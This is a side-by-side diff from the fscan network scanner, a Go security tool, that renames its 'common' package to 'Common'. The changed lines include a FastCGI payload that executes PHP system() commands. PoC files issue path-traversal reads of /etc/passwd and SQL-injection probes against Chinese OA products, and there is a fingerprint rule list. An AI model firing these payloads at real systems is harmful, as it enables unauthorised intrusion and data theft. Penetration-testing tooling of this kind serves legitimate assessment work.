case common.Command != "": case Common.Command != "":
reqParams = fmt.Sprintf("<?php system('%s');die('%s');?>", common.Command, cutLine) // 自定义命令 reqParams = fmt.Sprintf("<?php system('%s');die('%s');?>", Common.Command, cutLine) // 自定义命令
default: default:
reqParams = fmt.Sprintf("<?php system('whoami');die('%s');?>", cutLine) // 默认执行whoami reqParams = fmt.Sprintf("<?php system('whoami');die('%s');?>", cutLine) // 默认执行whoami
} }
@ -65,7 +65,7 @@ func FcgiScan(info *Config.HostInfo) error {
} }
// 建立FastCGI连接 // 建立FastCGI连接
fcgi, err := New(addr, common.Timeout) fcgi, err := New(addr, Common.Timeout)
defer func() { defer func() {
if fcgi.rwc != nil { if fcgi.rwc != nil {
fcgi.rwc.Close() fcgi.rwc.Close()
@ -97,7 +97,7 @@ func FcgiScan(info *Config.HostInfo) error {
result = fmt.Sprintf("[+] FastCGI漏洞确认 %v:%v\n命令输出:\n%v", result = fmt.Sprintf("[+] FastCGI漏洞确认 %v:%v\n命令输出:\n%v",
info.Host, info.Ports, output) info.Host, info.Ports, output)
} }
common.LogSuccess(result) Common.LogSuccess(result)
} else if strings.Contains(output, "File not found") || } else if strings.Contains(output, "File not found") ||
strings.Contains(output, "Content-type") || strings.Contains(output, "Content-type") ||
strings.Contains(output, "Status") { strings.Contains(output, "Status") {
@ -109,7 +109,7 @@ func FcgiScan(info *Config.HostInfo) error {
result = fmt.Sprintf("[*] FastCGI服务确认 %v:%v\n响应:\n%v", result = fmt.Sprintf("[*] FastCGI服务确认 %v:%v\n响应:\n%v",
info.Host, info.Ports, output) info.Host, info.Ports, output)
} }
common.LogSuccess(result) Common.LogSuccess(result)
} }
return nil return nil
@ -187,7 +187,7 @@ type FCGIClient struct {
} }
func New(addr string, timeout int64) (fcgi *FCGIClient, err error) { func New(addr string, timeout int64) (fcgi *FCGIClient, err error) {
conn, err := common.WrapperTcpWithTimeout("tcp", addr, time.Duration(timeout)*time.Second) conn, err := Common.WrapperTcpWithTimeout("tcp", addr, time.Duration(timeout)*time.Second)
fcgi = &FCGIClient{ fcgi = &FCGIClient{
rwc: conn, rwc: conn,
keepAlive: false, keepAlive: false,

4
WebScan/InfoScan.go
View File

@ -3,8 +3,8 @@ package WebScan
import ( import (
"crypto/md5" "crypto/md5"
"fmt" "fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/WebScan/info" "github.com/shadow1ng/fscan/WebScan/info"
"github.com/shadow1ng/fscan/common"
"regexp" "regexp"
) )
@ -39,7 +39,7 @@ func InfoCheck(Url string, CheckData *[]CheckDatas) []string {
if len(infoname) > 0 { if len(infoname) > 0 {
result := fmt.Sprintf("[+] InfoScan %-25v %s ", Url, infoname) result := fmt.Sprintf("[+] InfoScan %-25v %s ", Url, infoname)
common.LogSuccess(result) Common.LogSuccess(result)
return infoname return infoname
} }
return []string{""} return []string{""}

24
WebScan/WebScan.go
View File

@ -3,9 +3,9 @@ package WebScan
import ( import (
"embed" "embed"
"fmt" "fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config" "github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/WebScan/lib" "github.com/shadow1ng/fscan/WebScan/lib"
"github.com/shadow1ng/fscan/common"
"net/http" "net/http"
"os" "os"
"path/filepath" "path/filepath"
@ -20,7 +20,7 @@ var AllPocs []*lib.Poc
func WebScan(info *Config.HostInfo) { func WebScan(info *Config.HostInfo) {
once.Do(initpoc) once.Do(initpoc)
var pocinfo = common.Pocinfo var pocinfo = Common.Pocinfo
buf := strings.Split(info.Url, "/") buf := strings.Split(info.Url, "/")
pocinfo.Target = strings.Join(buf[:3], "/") pocinfo.Target = strings.Join(buf[:3], "/")
@ -34,25 +34,25 @@ func WebScan(info *Config.HostInfo) {
} }
} }
func Execute(PocInfo common.PocInfo) { func Execute(PocInfo Common.PocInfo) {
req, err := http.NewRequest("GET", PocInfo.Target, nil) req, err := http.NewRequest("GET", PocInfo.Target, nil)
if err != nil { if err != nil {
errlog := fmt.Sprintf("[-] webpocinit %v %v", PocInfo.Target, err) errlog := fmt.Sprintf("[-] webpocinit %v %v", PocInfo.Target, err)
common.LogError(errlog) Common.LogError(errlog)
return return
} }
req.Header.Set("User-agent", common.UserAgent) req.Header.Set("User-agent", Common.UserAgent)
req.Header.Set("Accept", common.Accept) req.Header.Set("Accept", Common.Accept)
req.Header.Set("Accept-Language", "zh-CN,zh;q=0.9") req.Header.Set("Accept-Language", "zh-CN,zh;q=0.9")
if common.Cookie != "" { if Common.Cookie != "" {
req.Header.Set("Cookie", common.Cookie) req.Header.Set("Cookie", Common.Cookie)
} }
pocs := filterPoc(PocInfo.PocName) pocs := filterPoc(PocInfo.PocName)
lib.CheckMultiPoc(req, pocs, common.PocNum) lib.CheckMultiPoc(req, pocs, Common.PocNum)
} }
func initpoc() { func initpoc() {
if common.PocPath == "" { if Common.PocPath == "" {
entries, err := Pocs.ReadDir("pocs") entries, err := Pocs.ReadDir("pocs")
if err != nil { if err != nil {
fmt.Printf("[-] init poc error: %v", err) fmt.Printf("[-] init poc error: %v", err)
@ -67,8 +67,8 @@ func initpoc() {
} }
} }
} else { } else {
fmt.Println("[+] load poc from " + common.PocPath) fmt.Println("[+] load poc from " + Common.PocPath)
err := filepath.Walk(common.PocPath, err := filepath.Walk(Common.PocPath,
func(path string, info os.FileInfo, err error) error { func(path string, info os.FileInfo, err error) error {
if err != nil || info == nil { if err != nil || info == nil {
return err return err

14
WebScan/info/rules.go → WebScan/info/Rules.go
View File

@ -72,7 +72,7 @@ var RuleDatas = []RuleData{
{"atmail-WebMail", "cookie", "(atmail6)"}, {"atmail-WebMail", "cookie", "(atmail6)"},
{"atmail-WebMail", "code", "(/index.php/mail/auth/processlogin|Powered by Atmail)"}, {"atmail-WebMail", "code", "(/index.php/mail/auth/processlogin|Powered by Atmail)"},
{"weblogic", "code", "(/console/framework/skins/wlsconsole/images/login_WebLogic_branding.png|Welcome to Weblogic Application Server|<i>Hypertext Transfer Protocol -- HTTP/1.1</i>)"}, {"weblogic", "code", "(/console/framework/skins/wlsconsole/images/login_WebLogic_branding.png|Welcome to Weblogic Application Server|<i>Hypertext Transfer Protocol -- HTTP/1.1</i>)"},
{"致远OA", "code", "(/seeyon/common/|/seeyon/USER-DATA/IMAGES/LOGIN/login.gif)"}, {"致远OA", "code", "(/seeyon/Common/|/seeyon/USER-DATA/IMAGES/LOGIN/login.gif)"},
{"discuz", "code", "(content=\"Discuz! X\")"}, {"discuz", "code", "(content=\"Discuz! X\")"},
{"Typecho", "code", "(Typecho</a>)"}, {"Typecho", "code", "(Typecho</a>)"},
{"金蝶EAS", "code", "(easSessionId)"}, {"金蝶EAS", "code", "(easSessionId)"},
@ -88,10 +88,10 @@ var RuleDatas = []RuleData{
{"CISCO_EPC3925", "code", "(Docsis_system)"}, {"CISCO_EPC3925", "code", "(Docsis_system)"},
{"CISCO ASR", "code", "(CISCO ASR)"}, {"CISCO ASR", "code", "(CISCO ASR)"},
{"H3C ER3200", "code", "(ER3200系统管理)"}, {"H3C ER3200", "code", "(ER3200系统管理)"},
{"万户oa", "code", "(/defaultroot/templates/template_system/common/css/|/defaultroot/scripts/|css/css_whir.css)"}, {"万户oa", "code", "(/defaultroot/templates/template_system/Common/css/|/defaultroot/scripts/|css/css_whir.css)"},
{"Spark_Master", "code", "(Spark Master at)"}, {"Spark_Master", "code", "(Spark Master at)"},
{"华为_HUAWEI_SRG2220", "code", "(HUAWEI SRG2220)"}, {"华为_HUAWEI_SRG2220", "code", "(HUAWEI SRG2220)"},
{"蓝凌OA", "code", "(/scripts/jquery.landray.common.js)"}, {"蓝凌OA", "code", "(/scripts/jquery.landray.Common.js)"},
{"深信服ssl-vpn", "code", "(login_psw.csp)"}, {"深信服ssl-vpn", "code", "(login_psw.csp)"},
{"华为 NetOpen", "code", "(/netopen/theme/css/inFrame.css)"}, {"华为 NetOpen", "code", "(/netopen/theme/css/inFrame.css)"},
{"Citrix-Web-PN-Server", "code", "(Citrix Web PN Server)"}, {"Citrix-Web-PN-Server", "code", "(Citrix Web PN Server)"},
@ -229,14 +229,14 @@ var RuleDatas = []RuleData{
{"帕拉迪统一安全管理和综合审计系统", "code", "(module/image/pldsec.css)"}, {"帕拉迪统一安全管理和综合审计系统", "code", "(module/image/pldsec.css)"},
{"蓝盾BDWebGuard", "code", "(BACKGROUND: url(images/loginbg.jpg) #e5f1fc)"}, {"蓝盾BDWebGuard", "code", "(BACKGROUND: url(images/loginbg.jpg) #e5f1fc)"},
{"Huawei SMC", "code", "(Script/SmcScript.js?version=)"}, {"Huawei SMC", "code", "(Script/SmcScript.js?version=)"},
{"coremail", "code", "(/coremail/bundle/|contextRoot: \"/coremail\"|coremail/common)"}, {"coremail", "code", "(/coremail/bundle/|contextRoot: \"/coremail\"|coremail/Common)"},
{"activemq", "code", "(activemq_logo|Manage ActiveMQ broker)"}, {"activemq", "code", "(activemq_logo|Manage ActiveMQ broker)"},
{"锐捷网络", "code", "(static/img/title.ico|support.ruijie.com.cn|Ruijie - NBR|eg.login.loginBtn)"}, {"锐捷网络", "code", "(static/img/title.ico|support.ruijie.com.cn|Ruijie - NBR|eg.login.loginBtn)"},
{"禅道", "code", "(/theme/default/images/main/zt-logo.png|zentaosid)"}, {"禅道", "code", "(/theme/default/images/main/zt-logo.png|zentaosid)"},
{"weblogic", "code", "(/console/framework/skins/wlsconsole/images/login_WebLogic_branding.png|Welcome to Weblogic Application Server|<i>Hypertext Transfer Protocol -- HTTP/1.1</i>|<TITLE>Error 404--Not Found</TITLE>|Welcome to Weblogic Application Server|<title>Oracle WebLogic Server 管理控制台</title>)"}, {"weblogic", "code", "(/console/framework/skins/wlsconsole/images/login_WebLogic_branding.png|Welcome to Weblogic Application Server|<i>Hypertext Transfer Protocol -- HTTP/1.1</i>|<TITLE>Error 404--Not Found</TITLE>|Welcome to Weblogic Application Server|<title>Oracle WebLogic Server 管理控制台</title>)"},
{"weblogic", "headers", "(WebLogic)"}, {"weblogic", "headers", "(WebLogic)"},
{"致远OA", "code", "(/seeyon/USER-DATA/IMAGES/LOGIN/login.gif|/seeyon/common/)"}, {"致远OA", "code", "(/seeyon/USER-DATA/IMAGES/LOGIN/login.gif|/seeyon/Common/)"},
{"蓝凌EIS智慧协同平台", "code", "(/scripts/jquery.landray.common.js)"}, {"蓝凌EIS智慧协同平台", "code", "(/scripts/jquery.landray.Common.js)"},
{"深信服ssl-vpn", "code", "(login_psw.csp|loginPageSP/loginPrivacy.js|/por/login_psw.csp)"}, {"深信服ssl-vpn", "code", "(login_psw.csp|loginPageSP/loginPrivacy.js|/por/login_psw.csp)"},
{"Struts2", "code", "(org.apache.struts2|Struts Problem Report|struts.devMode|struts-tags|There is no Action mapped for namespace)"}, {"Struts2", "code", "(org.apache.struts2|Struts Problem Report|struts.devMode|struts-tags|There is no Action mapped for namespace)"},
{"泛微OA", "code", "(/spa/portal/public/index.js|wui/theme/ecology8/page/images/login/username_wev8.png|/wui/index.html#/?logintype=1)"}, {"泛微OA", "code", "(/spa/portal/public/index.js|wui/theme/ecology8/page/images/login/username_wev8.png|/wui/index.html#/?logintype=1)"},
@ -246,7 +246,7 @@ var RuleDatas = []RuleData{
{"用友NC", "code", "(Yonyou UAP|YONYOU NC|/Client/Uclient/UClient.dmg|logo/images/ufida_nc.png|iufo/web/css/menu.css|/System/Login/Login.asp?AppID=|/nc/servlet/nc.ui.iufo.login.Index)"}, {"用友NC", "code", "(Yonyou UAP|YONYOU NC|/Client/Uclient/UClient.dmg|logo/images/ufida_nc.png|iufo/web/css/menu.css|/System/Login/Login.asp?AppID=|/nc/servlet/nc.ui.iufo.login.Index)"},
{"用友IUFO", "code", "(iufo/web/css/menu.css)"}, {"用友IUFO", "code", "(iufo/web/css/menu.css)"},
{"TELEPORT堡垒机", "code", "(/static/plugins/blur/background-blur.js)"}, {"TELEPORT堡垒机", "code", "(/static/plugins/blur/background-blur.js)"},
{"JEECMS", "code", "(/r/cms/www/red/js/common.js|/r/cms/www/red/js/indexshow.js|Powered by JEECMS|JEECMS|/jeeadmin/jeecms/index.do)"}, {"JEECMS", "code", "(/r/cms/www/red/js/Common.js|/r/cms/www/red/js/indexshow.js|Powered by JEECMS|JEECMS|/jeeadmin/jeecms/index.do)"},
{"CMS", "code", "(Powered by .*CMS)"}, {"CMS", "code", "(Powered by .*CMS)"},
{"目录遍历", "code", "(Directory listing for /)"}, {"目录遍历", "code", "(Directory listing for /)"},
{"ATLASSIAN-Confluence", "code", "(com.atlassian.confluence)"}, {"ATLASSIAN-Confluence", "code", "(com.atlassian.confluence)"},

16
WebScan/lib/check.go → WebScan/lib/Check.go
View File

@ -4,8 +4,8 @@ import (
"crypto/md5" "crypto/md5"
"fmt" "fmt"
"github.com/google/cel-go/cel" "github.com/google/cel-go/cel"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/WebScan/info" "github.com/shadow1ng/fscan/WebScan/info"
"github.com/shadow1ng/fscan/common"
"math/rand" "math/rand"
"net/http" "net/http"
"net/url" "net/url"
@ -34,7 +34,7 @@ func CheckMultiPoc(req *http.Request, pocs []*Poc, workers int) {
isVul, _, name := executePoc(task.Req, task.Poc) isVul, _, name := executePoc(task.Req, task.Poc)
if isVul { if isVul {
result := fmt.Sprintf("[+] PocScan %s %s %s", task.Req.URL, task.Poc.Name, name) result := fmt.Sprintf("[+] PocScan %s %s %s", task.Req.URL, task.Poc.Name, name)
common.LogSuccess(result) Common.LogSuccess(result)
} }
wg.Done() wg.Done()
} }
@ -82,7 +82,7 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error, string) {
for _, item := range p.Set { for _, item := range p.Set {
k, expression := item.Key, item.Value k, expression := item.Key, item.Value
if expression == "newReverse()" { if expression == "newReverse()" {
if !common.DnsLog { if !Common.DnsLog {
return false, nil, "" return false, nil, ""
} }
variableMap[k] = newReverse() variableMap[k] = newReverse()
@ -240,7 +240,7 @@ func optimizeCookies(rawCookie string) (output string) {
} }
func newReverse() *Reverse { func newReverse() *Reverse {
if !common.DnsLog { if !Common.DnsLog {
return &Reverse{} return &Reverse{}
} }
letters := "1234567890abcdefghijklmnopqrstuvwxyz" letters := "1234567890abcdefghijklmnopqrstuvwxyz"
@ -280,7 +280,7 @@ func clusterpoc(oReq *http.Request, p *Poc, variableMap map[string]interface{},
look: look:
for j, item := range setsMap { for j, item := range setsMap {
//shiro默认只跑10key //shiro默认只跑10key
if p.Name == "poc-yaml-shiro-key" && !common.PocFull && j >= 10 { if p.Name == "poc-yaml-shiro-key" && !Common.PocFull && j >= 10 {
if item[1] == "cbc" { if item[1] == "cbc" {
continue continue
} else { } else {
@ -356,15 +356,15 @@ func clusterpoc(oReq *http.Request, p *Poc, variableMap map[string]interface{},
if success { if success {
if rule.Continue { if rule.Continue {
if p.Name == "poc-yaml-backup-file" || p.Name == "poc-yaml-sql-file" { if p.Name == "poc-yaml-backup-file" || p.Name == "poc-yaml-sql-file" {
common.LogSuccess(fmt.Sprintf("[+] PocScan %s://%s%s %s", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name)) Common.LogSuccess(fmt.Sprintf("[+] PocScan %s://%s%s %s", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name))
} else { } else {
common.LogSuccess(fmt.Sprintf("[+] PocScan %s://%s%s %s %v", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name, tmpMap)) Common.LogSuccess(fmt.Sprintf("[+] PocScan %s://%s%s %s %v", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name, tmpMap))
} }
continue continue
} }
strMap = append(strMap, tmpMap...) strMap = append(strMap, tmpMap...)
if i == len(p.Rules)-1 { if i == len(p.Rules)-1 {
common.LogSuccess(fmt.Sprintf("[+] PocScan %s://%s%s %s %v", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name, strMap)) Common.LogSuccess(fmt.Sprintf("[+] PocScan %s://%s%s %s %v", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name, strMap))
//防止后续继续打印poc成功信息 //防止后续继续打印poc成功信息
return false, nil return false, nil
} }

18
WebScan/lib/client.go → WebScan/lib/Client.go
View File

@ -6,7 +6,7 @@ import (
"embed" "embed"
"errors" "errors"
"fmt" "fmt"
"github.com/shadow1ng/fscan/common" "github.com/shadow1ng/fscan/Common"
"golang.org/x/net/proxy" "golang.org/x/net/proxy"
"gopkg.in/yaml.v2" "gopkg.in/yaml.v2"
"net" "net"
@ -25,14 +25,14 @@ var (
) )
func Inithttp() { func Inithttp() {
//common.Proxy = "http://127.0.0.1:8080" //Common.Proxy = "http://127.0.0.1:8080"
if common.PocNum == 0 { if Common.PocNum == 0 {
common.PocNum = 20 Common.PocNum = 20
} }
if common.WebTimeout == 0 { if Common.WebTimeout == 0 {
common.WebTimeout = 5 Common.WebTimeout = 5
} }
err := InitHttpClient(common.PocNum, common.Proxy, time.Duration(common.WebTimeout)*time.Second) err := InitHttpClient(Common.PocNum, Common.Proxy, time.Duration(Common.WebTimeout)*time.Second)
if err != nil { if err != nil {
panic(err) panic(err)
} }
@ -56,8 +56,8 @@ func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) err
DisableKeepAlives: false, DisableKeepAlives: false,
} }
if common.Socks5Proxy != "" { if Common.Socks5Proxy != "" {
dialSocksProxy, err := common.Socks5Dailer(dialer) dialSocksProxy, err := Common.Socks5Dailer(dialer)
if err != nil { if err != nil {
return err return err
} }

6
WebScan/lib/eval.go → WebScan/lib/Eval.go
View File

@ -12,7 +12,7 @@ import (
"github.com/google/cel-go/common/types" "github.com/google/cel-go/common/types"
"github.com/google/cel-go/common/types/ref" "github.com/google/cel-go/common/types/ref"
"github.com/google/cel-go/interpreter/functions" "github.com/google/cel-go/interpreter/functions"
"github.com/shadow1ng/fscan/common" "github.com/shadow1ng/fscan/Common"
exprpb "google.golang.org/genproto/googleapis/api/expr/v1alpha1" exprpb "google.golang.org/genproto/googleapis/api/expr/v1alpha1"
"io" "io"
"math/rand" "math/rand"
@ -563,7 +563,7 @@ func randomString(n int) string {
} }
func reverseCheck(r *Reverse, timeout int64) bool { func reverseCheck(r *Reverse, timeout int64) bool {
if ceyeApi == "" || r.Domain == "" || !common.DnsLog { if ceyeApi == "" || r.Domain == "" || !Common.DnsLog {
return false return false
} }
time.Sleep(time.Second * time.Duration(timeout)) time.Sleep(time.Second * time.Duration(timeout))
@ -627,7 +627,7 @@ func DoRequest(req *http.Request, redirect bool) (*Response, error) {
defer oResp.Body.Close() defer oResp.Body.Close()
resp, err := ParseResponse(oResp) resp, err := ParseResponse(oResp)
if err != nil { if err != nil {
common.LogError("[-] ParseResponse error: " + err.Error()) Common.LogError("[-] ParseResponse error: " + err.Error())
//return nil, err //return nil, err
} }
return resp, err return resp, err

0
WebScan/lib/shiro.go → WebScan/lib/Shiro.go
View File

4
WebScan/pocs/ruoyi-management-fileread.yml
View File

@ -2,12 +2,12 @@ name: poc-yaml-ruoyi-management-fileread
groups: groups:
linux: linux:
- method: GET - method: GET
path: /common/download/resource?resource=/profile/../../../../etc/passwd path: /Common/download/resource?resource=/profile/../../../../etc/passwd
expression: | expression: |
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
windows: windows:
- method: GET - method: GET
path: /common/download/resource?resource=/profile/../../../../Windows/win.ini path: /Common/download/resource?resource=/profile/../../../../Windows/win.ini
expression: | expression: |
response.status == 200 && response.body.bcontains(b"for 16-bit app support") response.status == 200 && response.body.bcontains(b"for 16-bit app support")
detail: detail:

2
WebScan/pocs/seeyon-a6-test-jsp-sql.yml
View File

@ -3,7 +3,7 @@ set:
rand: randomInt(200000000, 210000000) rand: randomInt(200000000, 210000000)
rules: rules:
- method: GET - method: GET
path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}})) path: /yyoa/Common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}}))
expression: expression:
response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
detail: detail:

2
WebScan/pocs/yonyou-u8-oa-sqli.yml
View File

@ -3,7 +3,7 @@ set:
rand: randomInt(200000000, 220000000) rand: randomInt(200000000, 220000000)
rules: rules:
- method: GET - method: GET
path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}})) path: /yyoa/Common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}}))
follow_redirects: false follow_redirects: false
expression: | expression: |
response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))

2
common/config.go
View File

@ -1,4 +1,4 @@
package common package Common
var version = "1.8.4" var version = "1.8.4"
var Userdict = map[string][]string{ var Userdict = map[string][]string{

2
common/flag.go
View File

@ -1,4 +1,4 @@
package common package Common
import ( import (
"flag" "flag"

2
common/log.go
View File

@ -1,4 +1,4 @@
package common package Common
import ( import (
"encoding/json" "encoding/json"

2
common/proxy.go
View File

@ -1,4 +1,4 @@
package common package Common
import ( import (
"errors" "errors"

6
main.go
View File

@ -2,17 +2,17 @@ package main
import ( import (
"fmt" "fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config" "github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/Plugins" "github.com/shadow1ng/fscan/Plugins"
"github.com/shadow1ng/fscan/common"
"time" "time"
) )
func main() { func main() {
start := time.Now() start := time.Now()
var Info Config.HostInfo var Info Config.HostInfo
common.Flag(&Info) Common.Flag(&Info)
common.Parse(&Info) Common.Parse(&Info)
Plugins.Scan(Info) Plugins.Scan(Info)
fmt.Printf("[*] 扫描结束,耗时: %s\n", time.Since(start)) fmt.Printf("[*] 扫描结束,耗时: %s\n", time.Since(start))
} }